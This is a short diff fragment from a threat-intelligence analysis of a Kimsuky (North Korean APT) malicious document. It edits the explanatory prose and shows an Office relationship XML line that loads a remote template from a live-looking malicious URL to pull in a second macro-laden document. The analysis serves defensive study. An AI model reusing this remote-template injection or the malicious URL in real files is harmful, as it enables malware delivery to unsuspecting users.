StrangerealIntel/CyberThreatIntel/North Korea/APT/Kimsuky/2020-03-20/Analysis.md

 <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://crphone.mireene.com/plugin/editor/Templates/normal.php?name=web" TargetMode="External"/>
 </Relationships>
 ```
-<h6>This execute a second maldoc with a macro.
-The first block of the VBA code is the declaration for use the functions of the office version on Mac.</h6>
+<h6>This executes a second maldoc with a macro.
+The first block of the VBA code is the declaration for use the functions of the office version on Mac. <br/>Note : Mac OS X 10.8 comes with Python 2.7 pre-installed by Apple and now Python 3 on the lastest releases.</h6>

 ```python
 #If Mac Then